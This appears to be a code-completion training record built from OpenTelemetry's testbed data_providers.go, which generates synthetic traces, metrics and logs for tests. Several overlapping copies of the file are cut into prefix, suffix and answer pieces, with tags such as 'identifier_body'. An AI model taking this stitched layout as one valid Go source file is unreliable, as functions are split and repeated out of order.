func (dp *goldenDataProvider) GenerateLogs() (plog.Logs, bool) {
return plog.NewLogs(), true
}
// FileDataProvider in an implementation of the DataProvider for use in performance tests.
// The data to send is loaded from a file. The file should contain one JSON-encoded
// Export*ServiceRequest Protobuf message. The file can be recorded using the "file"
// exporter (note: "file" exporter writes one JSON message per line, FileDataProvider
// expects just a single JSON message in the entire file).
type FileDataProvider struct {
dataItemsGenerated *atomic.Uint64
logs plog.Logs
metrics pmetric.Metrics
traces ptrace.Traces
ItemsPerBatch int
}
// NewFileDataProvider creates an instance of FileDataProvider which generates test data
// loaded from a file.
func NewFileDataProvider(filePath string, dataType component.DataType) (*FileDataProvider, error) {
dp := &FileDataProvider{}
var err error
// Load the message from the file and count the data points.
switch dataType {
case component.DataTypeTraces:
if dp.traces, err = golden.ReadTraces(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.traces.SpanCount()
case component.DataTypeMetrics:
if dp.metrics, err = golden.ReadMetrics(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.metrics.DataPointCount()
case component.DataTypeLogs:
if dp.logs, err = golden.ReadLogs(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.logs.LogRecordCount()
}
return dp, nil
}
func (dp *FileDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *FileDataProvider) GenerateTraces() (ptrace.Traces, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.traces, false
}
func (dp *FileDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.metrics, false
}
func (dp *FileDataProvider) GenerateLogs() (plog.Logs, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.logs, false
}
| SetLoadGeneratorCounters | identifier_name |
data_providers.go | // Copyright The OpenTelemetry Authors
// SPDX-License-Identifier: Apache-2.0
package testbed // import "github.com/open-telemetry/opentelemetry-collector-contrib/testbed/testbed"
import (
"log"
"strconv"
"sync/atomic"
"time"
"go.opentelemetry.io/collector/component"
"go.opentelemetry.io/collector/pdata/pcommon"
"go.opentelemetry.io/collector/pdata/plog"
"go.opentelemetry.io/collector/pdata/pmetric"
"go.opentelemetry.io/collector/pdata/ptrace"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/golden"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/goldendataset"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/idutils"
)
// DataProvider defines the interface for generators of test data used to drive various end-to-end tests.
type DataProvider interface {
// SetLoadGeneratorCounters supplies pointers to LoadGenerator counters.
// The data provider implementation should increment these as it generates data.
SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64)
// GenerateTraces returns an internal Traces instance with an OTLP ResourceSpans slice populated with test data.
GenerateTraces() (ptrace.Traces, bool)
// GenerateMetrics returns an internal MetricData instance with an OTLP ResourceMetrics slice of test data.
GenerateMetrics() (pmetric.Metrics, bool)
// GenerateLogs returns the internal plog.Logs format
GenerateLogs() (plog.Logs, bool)
}
// perfTestDataProvider in an implementation of the DataProvider for use in performance tests.
// Tracing IDs are based on the incremented batch and data items counters.
type perfTestDataProvider struct {
options LoadOptions
traceIDSequence atomic.Uint64
dataItemsGenerated *atomic.Uint64
}
// NewPerfTestDataProvider creates an instance of perfTestDataProvider which generates test data based on the sizes
// specified in the supplied LoadOptions.
func NewPerfTestDataProvider(options LoadOptions) DataProvider {
return &perfTestDataProvider{
options: options,
}
}
func (dp *perfTestDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *perfTestDataProvider) GenerateTraces() (ptrace.Traces, bool) {
traceData := ptrace.NewTraces()
spans := traceData.ResourceSpans().AppendEmpty().ScopeSpans().AppendEmpty().Spans()
spans.EnsureCapacity(dp.options.ItemsPerBatch)
traceID := dp.traceIDSequence.Add(1)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
startTime := time.Now().Add(time.Duration(i+int(traceID)*1000) * time.Second)
endTime := startTime.Add(time.Millisecond)
spanID := dp.dataItemsGenerated.Add(1)
span := spans.AppendEmpty()
// Create a span.
span.SetTraceID(idutils.UInt64ToTraceID(0, traceID))
span.SetSpanID(idutils.UInt64ToSpanID(spanID))
span.SetName("load-generator-span" + strconv.FormatUint(spanID+traceID*1000, 10))
span.SetKind(ptrace.SpanKindClient)
attrs := span.Attributes()
attrs.PutInt("load_generator.span_seq_num", int64(spanID))
attrs.PutInt("load_generator.trace_seq_num", int64(traceID))
// Additional attributes.
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
span.SetStartTimestamp(pcommon.NewTimestampFromTime(startTime))
span.SetEndTimestamp(pcommon.NewTimestampFromTime(endTime))
}
return traceData, false
}
func (dp *perfTestDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
// Generate 7 data points per metric.
const dataPointsPerMetric = 7
md := pmetric.NewMetrics()
rm := md.ResourceMetrics().AppendEmpty()
if dp.options.Attributes != nil {
attrs := rm.Resource().Attributes()
attrs.EnsureCapacity(len(dp.options.Attributes))
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
}
metrics := rm.ScopeMetrics().AppendEmpty().Metrics()
metrics.EnsureCapacity(dp.options.ItemsPerBatch)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
metric := metrics.AppendEmpty()
metric.SetDescription("Load Generator Counter #" + strconv.Itoa(i))
metric.SetUnit("1")
dps := metric.SetEmptyGauge().DataPoints()
batchIndex := dp.traceIDSequence.Add(1)
// Generate data points for the metric.
dps.EnsureCapacity(dataPointsPerMetric)
for j := 0; j < dataPointsPerMetric; j++ {
dataPoint := dps.AppendEmpty()
dataPoint.SetStartTimestamp(pcommon.NewTimestampFromTime(time.Now()))
value := dp.dataItemsGenerated.Add(1)
dataPoint.SetIntValue(int64(value))
dataPoint.Attributes().PutStr("item_index", "item_"+strconv.Itoa(j))
dataPoint.Attributes().PutStr("batch_index", "batch_"+strconv.Itoa(int(batchIndex)))
}
}
return md, false
}
func (dp *perfTestDataProvider) GenerateLogs() (plog.Logs, bool) {
logs := plog.NewLogs()
rl := logs.ResourceLogs().AppendEmpty()
if dp.options.Attributes != nil {
attrs := rl.Resource().Attributes()
attrs.EnsureCapacity(len(dp.options.Attributes))
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
}
logRecords := rl.ScopeLogs().AppendEmpty().LogRecords()
logRecords.EnsureCapacity(dp.options.ItemsPerBatch)
now := pcommon.NewTimestampFromTime(time.Now())
batchIndex := dp.traceIDSequence.Add(1)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
itemIndex := dp.dataItemsGenerated.Add(1)
record := logRecords.AppendEmpty()
record.SetSeverityNumber(plog.SeverityNumberInfo3)
record.SetSeverityText("INFO3")
record.Body().SetStr("Load Generator Counter #" + strconv.Itoa(i))
record.SetFlags(plog.DefaultLogRecordFlags.WithIsSampled(true))
record.SetTimestamp(now)
attrs := record.Attributes()
attrs.PutStr("batch_index", "batch_"+strconv.Itoa(int(batchIndex)))
attrs.PutStr("item_index", "item_"+strconv.Itoa(int(itemIndex)))
attrs.PutStr("a", "test")
attrs.PutDouble("b", 5.0)
attrs.PutInt("c", 3)
attrs.PutBool("d", true)
}
return logs, false
}
// goldenDataProvider is an implementation of DataProvider for use in correctness tests.
// Provided data from the "Golden" dataset generated using pairwise combinatorial testing techniques.
type goldenDataProvider struct {
tracePairsFile string
spanPairsFile string
dataItemsGenerated *atomic.Uint64
tracesGenerated []ptrace.Traces
tracesIndex int
metricPairsFile string
metricsGenerated []pmetric.Metrics
metricsIndex int
}
// NewGoldenDataProvider creates a new instance of goldenDataProvider which generates test data based
// on the pairwise combinations specified in the tracePairsFile and spanPairsFile input variables.
func NewGoldenDataProvider(tracePairsFile string, spanPairsFile string, metricPairsFile string) DataProvider {
return &goldenDataProvider{
tracePairsFile: tracePairsFile,
spanPairsFile: spanPairsFile,
metricPairsFile: metricPairsFile,
}
}
func (dp *goldenDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *goldenDataProvider) GenerateTraces() (ptrace.Traces, bool) {
if dp.tracesGenerated == nil {
var err error
dp.tracesGenerated, err = goldendataset.GenerateTraces(dp.tracePairsFile, dp.spanPairsFile)
if err != nil {
log.Printf("cannot generate traces: %s", err)
dp.tracesGenerated = nil
}
}
if dp.tracesIndex >= len(dp.tracesGenerated) {
return ptrace.NewTraces(), true
}
td := dp.tracesGenerated[dp.tracesIndex]
dp.tracesIndex++
dp.dataItemsGenerated.Add(uint64(td.SpanCount()))
return td, false
}
func (dp *goldenDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
if dp.metricsGenerated == nil {
var err error
dp.metricsGenerated, err = goldendataset.GenerateMetrics(dp.metricPairsFile)
if err != nil {
log.Printf("cannot generate metrics: %s", err)
}
}
if dp.metricsIndex == len(dp.metricsGenerated) {
return pmetric.Metrics{}, true
}
pdm := dp.metricsGenerated[dp.metricsIndex]
dp.metricsIndex++
dp.dataItemsGenerated.Add(uint64(pdm.DataPointCount()))
return pdm, false
}
func (dp *goldenDataProvider) GenerateLogs() (plog.Logs, bool) {
return plog.NewLogs(), true
}
// FileDataProvider in an implementation of the DataProvider for use in performance tests.
// The data to send is loaded from a file. The file should contain one JSON-encoded
// Export*ServiceRequest Protobuf message. The file can be recorded using the "file"
// exporter (note: "file" exporter writes one JSON message per line, FileDataProvider
// expects just a single JSON message in the entire file).
type FileDataProvider struct {
dataItemsGenerated *atomic.Uint64
logs plog.Logs
metrics pmetric.Metrics
traces ptrace.Traces
ItemsPerBatch int
}
// NewFileDataProvider creates an instance of FileDataProvider which generates test data
// loaded from a file.
func NewFileDataProvider(filePath string, dataType component.DataType) (*FileDataProvider, error) {
dp := &FileDataProvider{}
var err error
// Load the message from the file and count the data points.
switch dataType {
case component.DataTypeTraces:
if dp.traces, err = golden.ReadTraces(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.traces.SpanCount()
case component.DataTypeMetrics:
if dp.metrics, err = golden.ReadMetrics(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.metrics.DataPointCount()
case component.DataTypeLogs:
if dp.logs, err = golden.ReadLogs(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.logs.LogRecordCount()
}
return dp, nil
}
func (dp *FileDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) |
func (dp *FileDataProvider) GenerateTraces() (ptrace.Traces, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.traces, false
}
func (dp *FileDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.metrics, false
}
func (dp *FileDataProvider) GenerateLogs() (plog.Logs, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.logs, false
}
| {
dp.dataItemsGenerated = dataItemsGenerated
} | identifier_body |
data_providers.go | // Copyright The OpenTelemetry Authors
// SPDX-License-Identifier: Apache-2.0
package testbed // import "github.com/open-telemetry/opentelemetry-collector-contrib/testbed/testbed"
import (
"log"
"strconv"
"sync/atomic"
"time"
"go.opentelemetry.io/collector/component"
"go.opentelemetry.io/collector/pdata/pcommon"
"go.opentelemetry.io/collector/pdata/plog"
"go.opentelemetry.io/collector/pdata/pmetric"
"go.opentelemetry.io/collector/pdata/ptrace"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/golden"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/goldendataset"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/idutils"
)
// DataProvider defines the interface for generators of test data used to drive various end-to-end tests.
type DataProvider interface {
// SetLoadGeneratorCounters supplies pointers to LoadGenerator counters.
// The data provider implementation should increment these as it generates data.
SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64)
// GenerateTraces returns an internal Traces instance with an OTLP ResourceSpans slice populated with test data.
GenerateTraces() (ptrace.Traces, bool)
// GenerateMetrics returns an internal MetricData instance with an OTLP ResourceMetrics slice of test data.
GenerateMetrics() (pmetric.Metrics, bool)
// GenerateLogs returns the internal plog.Logs format
GenerateLogs() (plog.Logs, bool)
}
// perfTestDataProvider in an implementation of the DataProvider for use in performance tests.
// Tracing IDs are based on the incremented batch and data items counters.
type perfTestDataProvider struct {
options LoadOptions
traceIDSequence atomic.Uint64
dataItemsGenerated *atomic.Uint64
}
// NewPerfTestDataProvider creates an instance of perfTestDataProvider which generates test data based on the sizes
// specified in the supplied LoadOptions.
func NewPerfTestDataProvider(options LoadOptions) DataProvider {
return &perfTestDataProvider{
options: options,
}
}
func (dp *perfTestDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *perfTestDataProvider) GenerateTraces() (ptrace.Traces, bool) {
traceData := ptrace.NewTraces()
spans := traceData.ResourceSpans().AppendEmpty().ScopeSpans().AppendEmpty().Spans()
spans.EnsureCapacity(dp.options.ItemsPerBatch)
traceID := dp.traceIDSequence.Add(1)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
startTime := time.Now().Add(time.Duration(i+int(traceID)*1000) * time.Second)
endTime := startTime.Add(time.Millisecond)
spanID := dp.dataItemsGenerated.Add(1)
span := spans.AppendEmpty()
// Create a span.
span.SetTraceID(idutils.UInt64ToTraceID(0, traceID))
span.SetSpanID(idutils.UInt64ToSpanID(spanID))
span.SetName("load-generator-span" + strconv.FormatUint(spanID+traceID*1000, 10))
span.SetKind(ptrace.SpanKindClient)
attrs := span.Attributes()
attrs.PutInt("load_generator.span_seq_num", int64(spanID))
attrs.PutInt("load_generator.trace_seq_num", int64(traceID))
// Additional attributes.
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
span.SetStartTimestamp(pcommon.NewTimestampFromTime(startTime))
span.SetEndTimestamp(pcommon.NewTimestampFromTime(endTime))
}
return traceData, false
}
func (dp *perfTestDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
// Generate 7 data points per metric.
const dataPointsPerMetric = 7
md := pmetric.NewMetrics()
rm := md.ResourceMetrics().AppendEmpty()
if dp.options.Attributes != nil {
attrs := rm.Resource().Attributes()
attrs.EnsureCapacity(len(dp.options.Attributes))
for k, v := range dp.options.Attributes |
}
metrics := rm.ScopeMetrics().AppendEmpty().Metrics()
metrics.EnsureCapacity(dp.options.ItemsPerBatch)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
metric := metrics.AppendEmpty()
metric.SetDescription("Load Generator Counter #" + strconv.Itoa(i))
metric.SetUnit("1")
dps := metric.SetEmptyGauge().DataPoints()
batchIndex := dp.traceIDSequence.Add(1)
// Generate data points for the metric.
dps.EnsureCapacity(dataPointsPerMetric)
for j := 0; j < dataPointsPerMetric; j++ {
dataPoint := dps.AppendEmpty()
dataPoint.SetStartTimestamp(pcommon.NewTimestampFromTime(time.Now()))
value := dp.dataItemsGenerated.Add(1)
dataPoint.SetIntValue(int64(value))
dataPoint.Attributes().PutStr("item_index", "item_"+strconv.Itoa(j))
dataPoint.Attributes().PutStr("batch_index", "batch_"+strconv.Itoa(int(batchIndex)))
}
}
return md, false
}
func (dp *perfTestDataProvider) GenerateLogs() (plog.Logs, bool) {
logs := plog.NewLogs()
rl := logs.ResourceLogs().AppendEmpty()
if dp.options.Attributes != nil {
attrs := rl.Resource().Attributes()
attrs.EnsureCapacity(len(dp.options.Attributes))
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
}
logRecords := rl.ScopeLogs().AppendEmpty().LogRecords()
logRecords.EnsureCapacity(dp.options.ItemsPerBatch)
now := pcommon.NewTimestampFromTime(time.Now())
batchIndex := dp.traceIDSequence.Add(1)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
itemIndex := dp.dataItemsGenerated.Add(1)
record := logRecords.AppendEmpty()
record.SetSeverityNumber(plog.SeverityNumberInfo3)
record.SetSeverityText("INFO3")
record.Body().SetStr("Load Generator Counter #" + strconv.Itoa(i))
record.SetFlags(plog.DefaultLogRecordFlags.WithIsSampled(true))
record.SetTimestamp(now)
attrs := record.Attributes()
attrs.PutStr("batch_index", "batch_"+strconv.Itoa(int(batchIndex)))
attrs.PutStr("item_index", "item_"+strconv.Itoa(int(itemIndex)))
attrs.PutStr("a", "test")
attrs.PutDouble("b", 5.0)
attrs.PutInt("c", 3)
attrs.PutBool("d", true)
}
return logs, false
}
// goldenDataProvider is an implementation of DataProvider for use in correctness tests.
// Provided data from the "Golden" dataset generated using pairwise combinatorial testing techniques.
type goldenDataProvider struct {
tracePairsFile string
spanPairsFile string
dataItemsGenerated *atomic.Uint64
tracesGenerated []ptrace.Traces
tracesIndex int
metricPairsFile string
metricsGenerated []pmetric.Metrics
metricsIndex int
}
// NewGoldenDataProvider creates a new instance of goldenDataProvider which generates test data based
// on the pairwise combinations specified in the tracePairsFile and spanPairsFile input variables.
func NewGoldenDataProvider(tracePairsFile string, spanPairsFile string, metricPairsFile string) DataProvider {
return &goldenDataProvider{
tracePairsFile: tracePairsFile,
spanPairsFile: spanPairsFile,
metricPairsFile: metricPairsFile,
}
}
func (dp *goldenDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *goldenDataProvider) GenerateTraces() (ptrace.Traces, bool) {
if dp.tracesGenerated == nil {
var err error
dp.tracesGenerated, err = goldendataset.GenerateTraces(dp.tracePairsFile, dp.spanPairsFile)
if err != nil {
log.Printf("cannot generate traces: %s", err)
dp.tracesGenerated = nil
}
}
if dp.tracesIndex >= len(dp.tracesGenerated) {
return ptrace.NewTraces(), true
}
td := dp.tracesGenerated[dp.tracesIndex]
dp.tracesIndex++
dp.dataItemsGenerated.Add(uint64(td.SpanCount()))
return td, false
}
func (dp *goldenDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
if dp.metricsGenerated == nil {
var err error
dp.metricsGenerated, err = goldendataset.GenerateMetrics(dp.metricPairsFile)
if err != nil {
log.Printf("cannot generate metrics: %s", err)
}
}
if dp.metricsIndex == len(dp.metricsGenerated) {
return pmetric.Metrics{}, true
}
pdm := dp.metricsGenerated[dp.metricsIndex]
dp.metricsIndex++
dp.dataItemsGenerated.Add(uint64(pdm.DataPointCount()))
return pdm, false
}
func (dp *goldenDataProvider) GenerateLogs() (plog.Logs, bool) {
return plog.NewLogs(), true
}
// FileDataProvider in an implementation of the DataProvider for use in performance tests.
// The data to send is loaded from a file. The file should contain one JSON-encoded
// Export*ServiceRequest Protobuf message. The file can be recorded using the "file"
// exporter (note: "file" exporter writes one JSON message per line, FileDataProvider
// expects just a single JSON message in the entire file).
type FileDataProvider struct {
dataItemsGenerated *atomic.Uint64
logs plog.Logs
metrics pmetric.Metrics
traces ptrace.Traces
ItemsPerBatch int
}
// NewFileDataProvider creates an instance of FileDataProvider which generates test data
// loaded from a file.
func NewFileDataProvider(filePath string, dataType component.DataType) (*FileDataProvider, error) {
dp := &FileDataProvider{}
var err error
// Load the message from the file and count the data points.
switch dataType {
case component.DataTypeTraces:
if dp.traces, err = golden.ReadTraces(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.traces.SpanCount()
case component.DataTypeMetrics:
if dp.metrics, err = golden.ReadMetrics(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.metrics.DataPointCount()
case component.DataTypeLogs:
if dp.logs, err = golden.ReadLogs(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.logs.LogRecordCount()
}
return dp, nil
}
func (dp *FileDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *FileDataProvider) GenerateTraces() (ptrace.Traces, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.traces, false
}
func (dp *FileDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.metrics, false
}
func (dp *FileDataProvider) GenerateLogs() (plog.Logs, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.logs, false
}
| {
attrs.PutStr(k, v)
} | conditional_block |
data_providers.go | // Copyright The OpenTelemetry Authors
// SPDX-License-Identifier: Apache-2.0
package testbed // import "github.com/open-telemetry/opentelemetry-collector-contrib/testbed/testbed"
import (
"log"
"strconv"
"sync/atomic"
"time"
"go.opentelemetry.io/collector/component"
"go.opentelemetry.io/collector/pdata/pcommon"
"go.opentelemetry.io/collector/pdata/plog"
"go.opentelemetry.io/collector/pdata/pmetric"
"go.opentelemetry.io/collector/pdata/ptrace"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/golden"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/goldendataset"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/idutils"
)
// DataProvider defines the interface for generators of test data used to drive various end-to-end tests.
type DataProvider interface {
// SetLoadGeneratorCounters supplies pointers to LoadGenerator counters.
// The data provider implementation should increment these as it generates data.
SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64)
// GenerateTraces returns an internal Traces instance with an OTLP ResourceSpans slice populated with test data.
GenerateTraces() (ptrace.Traces, bool)
// GenerateMetrics returns an internal MetricData instance with an OTLP ResourceMetrics slice of test data.
GenerateMetrics() (pmetric.Metrics, bool)
// GenerateLogs returns the internal plog.Logs format
GenerateLogs() (plog.Logs, bool)
}
// perfTestDataProvider in an implementation of the DataProvider for use in performance tests.
// Tracing IDs are based on the incremented batch and data items counters. | type perfTestDataProvider struct {
options LoadOptions
traceIDSequence atomic.Uint64
dataItemsGenerated *atomic.Uint64
}
// NewPerfTestDataProvider creates an instance of perfTestDataProvider which generates test data based on the sizes
// specified in the supplied LoadOptions.
func NewPerfTestDataProvider(options LoadOptions) DataProvider {
return &perfTestDataProvider{
options: options,
}
}
func (dp *perfTestDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *perfTestDataProvider) GenerateTraces() (ptrace.Traces, bool) {
traceData := ptrace.NewTraces()
spans := traceData.ResourceSpans().AppendEmpty().ScopeSpans().AppendEmpty().Spans()
spans.EnsureCapacity(dp.options.ItemsPerBatch)
traceID := dp.traceIDSequence.Add(1)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
startTime := time.Now().Add(time.Duration(i+int(traceID)*1000) * time.Second)
endTime := startTime.Add(time.Millisecond)
spanID := dp.dataItemsGenerated.Add(1)
span := spans.AppendEmpty()
// Create a span.
span.SetTraceID(idutils.UInt64ToTraceID(0, traceID))
span.SetSpanID(idutils.UInt64ToSpanID(spanID))
span.SetName("load-generator-span" + strconv.FormatUint(spanID+traceID*1000, 10))
span.SetKind(ptrace.SpanKindClient)
attrs := span.Attributes()
attrs.PutInt("load_generator.span_seq_num", int64(spanID))
attrs.PutInt("load_generator.trace_seq_num", int64(traceID))
// Additional attributes.
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
span.SetStartTimestamp(pcommon.NewTimestampFromTime(startTime))
span.SetEndTimestamp(pcommon.NewTimestampFromTime(endTime))
}
return traceData, false
}
func (dp *perfTestDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
// Generate 7 data points per metric.
const dataPointsPerMetric = 7
md := pmetric.NewMetrics()
rm := md.ResourceMetrics().AppendEmpty()
if dp.options.Attributes != nil {
attrs := rm.Resource().Attributes()
attrs.EnsureCapacity(len(dp.options.Attributes))
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
}
metrics := rm.ScopeMetrics().AppendEmpty().Metrics()
metrics.EnsureCapacity(dp.options.ItemsPerBatch)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
metric := metrics.AppendEmpty()
metric.SetDescription("Load Generator Counter #" + strconv.Itoa(i))
metric.SetUnit("1")
dps := metric.SetEmptyGauge().DataPoints()
batchIndex := dp.traceIDSequence.Add(1)
// Generate data points for the metric.
dps.EnsureCapacity(dataPointsPerMetric)
for j := 0; j < dataPointsPerMetric; j++ {
dataPoint := dps.AppendEmpty()
dataPoint.SetStartTimestamp(pcommon.NewTimestampFromTime(time.Now()))
value := dp.dataItemsGenerated.Add(1)
dataPoint.SetIntValue(int64(value))
dataPoint.Attributes().PutStr("item_index", "item_"+strconv.Itoa(j))
dataPoint.Attributes().PutStr("batch_index", "batch_"+strconv.Itoa(int(batchIndex)))
}
}
return md, false
}
func (dp *perfTestDataProvider) GenerateLogs() (plog.Logs, bool) {
logs := plog.NewLogs()
rl := logs.ResourceLogs().AppendEmpty()
if dp.options.Attributes != nil {
attrs := rl.Resource().Attributes()
attrs.EnsureCapacity(len(dp.options.Attributes))
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
}
logRecords := rl.ScopeLogs().AppendEmpty().LogRecords()
logRecords.EnsureCapacity(dp.options.ItemsPerBatch)
now := pcommon.NewTimestampFromTime(time.Now())
batchIndex := dp.traceIDSequence.Add(1)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
itemIndex := dp.dataItemsGenerated.Add(1)
record := logRecords.AppendEmpty()
record.SetSeverityNumber(plog.SeverityNumberInfo3)
record.SetSeverityText("INFO3")
record.Body().SetStr("Load Generator Counter #" + strconv.Itoa(i))
record.SetFlags(plog.DefaultLogRecordFlags.WithIsSampled(true))
record.SetTimestamp(now)
attrs := record.Attributes()
attrs.PutStr("batch_index", "batch_"+strconv.Itoa(int(batchIndex)))
attrs.PutStr("item_index", "item_"+strconv.Itoa(int(itemIndex)))
attrs.PutStr("a", "test")
attrs.PutDouble("b", 5.0)
attrs.PutInt("c", 3)
attrs.PutBool("d", true)
}
return logs, false
}
// goldenDataProvider is an implementation of DataProvider for use in correctness tests.
// Provided data from the "Golden" dataset generated using pairwise combinatorial testing techniques.
type goldenDataProvider struct {
tracePairsFile string
spanPairsFile string
dataItemsGenerated *atomic.Uint64
tracesGenerated []ptrace.Traces
tracesIndex int
metricPairsFile string
metricsGenerated []pmetric.Metrics
metricsIndex int
}
// NewGoldenDataProvider creates a new instance of goldenDataProvider which generates test data based
// on the pairwise combinations specified in the tracePairsFile and spanPairsFile input variables.
func NewGoldenDataProvider(tracePairsFile string, spanPairsFile string, metricPairsFile string) DataProvider {
return &goldenDataProvider{
tracePairsFile: tracePairsFile,
spanPairsFile: spanPairsFile,
metricPairsFile: metricPairsFile,
}
}
func (dp *goldenDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *goldenDataProvider) GenerateTraces() (ptrace.Traces, bool) {
if dp.tracesGenerated == nil {
var err error
dp.tracesGenerated, err = goldendataset.GenerateTraces(dp.tracePairsFile, dp.spanPairsFile)
if err != nil {
log.Printf("cannot generate traces: %s", err)
dp.tracesGenerated = nil
}
}
if dp.tracesIndex >= len(dp.tracesGenerated) {
return ptrace.NewTraces(), true
}
td := dp.tracesGenerated[dp.tracesIndex]
dp.tracesIndex++
dp.dataItemsGenerated.Add(uint64(td.SpanCount()))
return td, false
}
func (dp *goldenDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
if dp.metricsGenerated == nil {
var err error
dp.metricsGenerated, err = goldendataset.GenerateMetrics(dp.metricPairsFile)
if err != nil {
log.Printf("cannot generate metrics: %s", err)
}
}
if dp.metricsIndex == len(dp.metricsGenerated) {
return pmetric.Metrics{}, true
}
pdm := dp.metricsGenerated[dp.metricsIndex]
dp.metricsIndex++
dp.dataItemsGenerated.Add(uint64(pdm.DataPointCount()))
return pdm, false
}
func (dp *goldenDataProvider) GenerateLogs() (plog.Logs, bool) {
return plog.NewLogs(), true
}
// FileDataProvider in an implementation of the DataProvider for use in performance tests.
// The data to send is loaded from a file. The file should contain one JSON-encoded
// Export*ServiceRequest Protobuf message. The file can be recorded using the "file"
// exporter (note: "file" exporter writes one JSON message per line, FileDataProvider
// expects just a single JSON message in the entire file).
type FileDataProvider struct {
dataItemsGenerated *atomic.Uint64
logs plog.Logs
metrics pmetric.Metrics
traces ptrace.Traces
ItemsPerBatch int
}
// NewFileDataProvider creates an instance of FileDataProvider which generates test data
// loaded from a file.
func NewFileDataProvider(filePath string, dataType component.DataType) (*FileDataProvider, error) {
dp := &FileDataProvider{}
var err error
// Load the message from the file and count the data points.
switch dataType {
case component.DataTypeTraces:
if dp.traces, err = golden.ReadTraces(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.traces.SpanCount()
case component.DataTypeMetrics:
if dp.metrics, err = golden.ReadMetrics(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.metrics.DataPointCount()
case component.DataTypeLogs:
if dp.logs, err = golden.ReadLogs(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.logs.LogRecordCount()
}
return dp, nil
}
func (dp *FileDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *FileDataProvider) GenerateTraces() (ptrace.Traces, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.traces, false
}
func (dp *FileDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.metrics, false
}
